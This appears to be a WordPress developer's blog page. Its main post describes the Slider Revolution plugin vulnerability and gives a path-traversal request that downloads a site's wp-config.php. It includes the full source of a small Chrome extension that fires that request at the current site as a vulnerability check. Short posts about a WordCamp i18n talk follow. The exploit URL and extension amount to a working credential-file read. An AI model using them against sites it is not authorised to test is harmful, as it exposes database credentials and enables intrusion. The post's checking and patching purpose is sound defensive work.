History

While the Slider Revolution exploit is, at this point, fairly old news, it seems that not everyone got the memo. In a recent post by Wordfence, they claim that the recent Panama Papers fiasco may have begun by a breach of the Mossack Fonseca web server through this exploit.

The agency where I work applied fixes to all of our client sites as soon as the initial news hit, but I have a college friend who recently inherited a number of WordPress websites at his job. After reading the Wordfence article, he realized he didn’t know if any of his new clients had versions of the plugin that would still be vulnerable. Of course the simple answer is “go update all of your plugins”, but since the plugin is baked into the theme in so many cases (and how many made-by-another-developer sites do you have that are all properly child-themed and easy to update?) he couldn’t simply go to his Plugins page on every site to download the new version.

The exploit itself is quite easy to test for: simply use your browser to navigate to admin-ajax.php with the appropriate parameters, and if the site is running a vulnerable copy of the plugin your browser will automatically download the site’s wp-config file.

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Solution

What I did to help him out was write a quick Chrome Extension that allowed him to browse to his client sites, click the button, and the extension would attempt to download the `wp-config.php` file from the server. If he got the file, he knew he had a problematic copy of Slider Revolution. If the site responded in any other way, he was likely fine.

The extension was put together in about 15 minutes, and is the first Chrome Extension I’ve written, so it isn’t very fancy. I could have done something rather than try to download the file in the browser, so we could display “success” or “failure” when trying to exploit the site. It also assumes that WordPress lives at the root of the website, since the extension will attempt to access `/wp-admin/` at the root of the domain – if a site has a vulnerable plugin installed but, for example, contains the WordPress installation in the `/wordpress/` directory, this extension will not effectively find the exploitable path.

Download

Click here to download the extension now

I’m distributing the extension in its “unpacked” state, so that people can review it before use. Since the zip file contains a folder with all of the raw files, you will need to enable Developer Mode in Chrome in order to load the extension if you’d like to use it yourself. Click here for instructions on how to load an unpacked extension in Google Chrome

NOTE: Obviously you use this code at your own risk and for your own purposes. You alone are responsible for your own actions. I cannot be held responsible for anything you do with this extension, or the code/information provided on this page.

Source

You may also view the source code of the `manifest.json` and `background.js` files below, which are the only pieces of code in the whole extension. Enjoy!

{
  "manifest_version": 2,

  "name": "Revolution Slider Checker",
  "description": "This extension will check the current website to see if their Revolution Slider is vulnerable to the known exploit that allows you to download the wp-config.php file",
  "version": "1.0",

  "browser_action": {
    "default_icon": "icon.png",
	"default_title": "Click here to check"
  },
  "background": {
    "scripts": ["background.js"]
  },
  "permissions": [
    "activeTab"
  ]
}
// More info on the Slider Revolution exploit
// https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html

chrome.browserAction.onClicked.addListener(function(tab) { 
	
	var uri = tab.url;
	var origin = uri.match(/^[\w-]+:\/{2,}\[?[\w\.:-]+\]?(?::[0-9]*)?/)[0];		// regex taken from http://stackoverflow.com/questions/3689423/google-chrome-plugin-how-to-get-domain-from-url-tab-url 

	chrome.tabs.update(tab.id, {
        
		url: origin + '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
		
    });
	
});

 

i18n logoIf you’re here looking for the slides from my i18n / l10n presentation from WordCamp Rhode Island 2015, you’ve come to the right place!

If you attended my presentation, I hope you enjoyed it and learned something about i18n today! If you didn’t attend, I hope these slides are still helpful to you.

If you still have any questions, please get in touch with me! I’d be happy to help answer any questions you have.

Click here to view the presentation on Speaker Deck

wcri2015Very excited to hear, and announce, that I’ve been selected to speak at WordCamp Rhode Island at the end of the month!

I’ll be speaking at the 4:30 time slot on i18n/l10n, aka: Internationalization and Localization. I’ve used many of the gettext functions in my own code before, but haven’t touched too much on the less-common functions and I felt that it was an important enough topic that there was value in teaching it to people who may be writing their own plugins or themes and didn’t currently use the functions. Plus, I know I’ll learn a ton putting together the presentation! You always learn a topic best when putting material together so that you can teach it to others.

Saturday, 9/26 @ 4:30pm ET on the NEIT campus in East Greenwich, RI. Maybe I’ll see you there!